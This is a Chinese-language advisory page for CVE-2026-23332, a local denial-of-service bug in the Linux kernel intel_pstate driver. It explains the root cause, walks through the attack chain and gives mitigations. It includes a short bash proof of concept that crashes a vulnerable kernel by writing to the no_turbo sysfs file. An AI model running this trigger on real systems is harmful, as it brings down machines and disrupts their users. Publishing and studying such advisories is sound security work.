CVE-2026-23332 CVSS 5.5 中危

CVE-2026-23332 Linux内核intel_pstate空指针崩溃漏洞

披露日期: 2026-03-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23332

漏洞类型

本地拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核intel_pstate驱动存在空指针解引用漏洞。当系统使用“nosmt”或“maxcpus”参数启动限制CPU数量时，用户通过写入no_turbo文件禁用Turbo功能会导致内核崩溃。该漏洞源于代码错误地遍历了离线CPU，访问了未初始化的all_cpu_data指针，从而引发系统异常和拒绝服务。

技术细节

该漏洞位于Linux内核的cpufreq: intel_pstate驱动模块中。问题根源在于store_no_turbo函数处理Turbo禁用请求时的逻辑缺陷。当系统通过内核参数（如“nosmt”或“maxcpus”）启动并限制了在线CPU数量时，部分CPU处于离线状态。在更新最大频率的流程中，代码使用了for_each_possible_cpu()宏进行遍历，这导致迭代范围包含了所有可能但当前未上线的CPU。对于这些离线CPU，全局数组all_cpu_data[]中对应的指针为NULL。由于后续代码直接对该指针进行解引用操作（访问结构体成员），导致内核发生“Oops”错误（通常是页错误）。这会引发内核恐慌或崩溃，导致系统拒绝服务。攻击者仅需本地低权限即可执行触发操作。

攻击链分析

STEP 1

环境准备

系统使用“nosmt”或“maxcpus”参数启动，导致部分CPU处于离线状态。

STEP 2

执行攻击

本地低权限用户执行命令，向/sys/devices/system/cpu/intel_pstate/no_turbo写入“1”。

STEP 3

触发漏洞

内核处理写入请求时，遍历离线CPU并访问NULL指针，触发页面错误。

STEP 4

系统崩溃

内核发生Oops或Panic，导致系统重启或死机，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-23332: Linux Kernel intel_pstate Crash
# Description: Trigger NULL pointer dereference by disabling turbo on restricted CPUs.
# Prerequisites: System must be booted with 'nosmt' or 'maxcpus' argument.

echo "[+] Checking if system is vulnerable..."
if [ -w /sys/devices/system/cpu/intel_pstate/no_turbo ]; then
    echo "[+] Attempting to write to no_turbo..."
    # This write operation triggers the crash in the vulnerable kernel
    echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo
    echo "[+] If the kernel is vulnerable, the system should have crashed by now."
else
    echo "[-] Cannot write to no_turbo or file does not exist."
fi

影响范围

Linux Kernel (Commit 973207ae3d7c之前)

Linux Kernel (Git commits before 6b050482ec40569429d963ac52afa878691b04c9)

防御指南

临时缓解措施

临时缓解措施包括避免在启动参数中使用“nosmt”或“maxcpus”，或者严格限制对/sys/devices/system/cpu/intel_pstate/no_turbo文件的访问权限，仅允许 root 用户写入。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表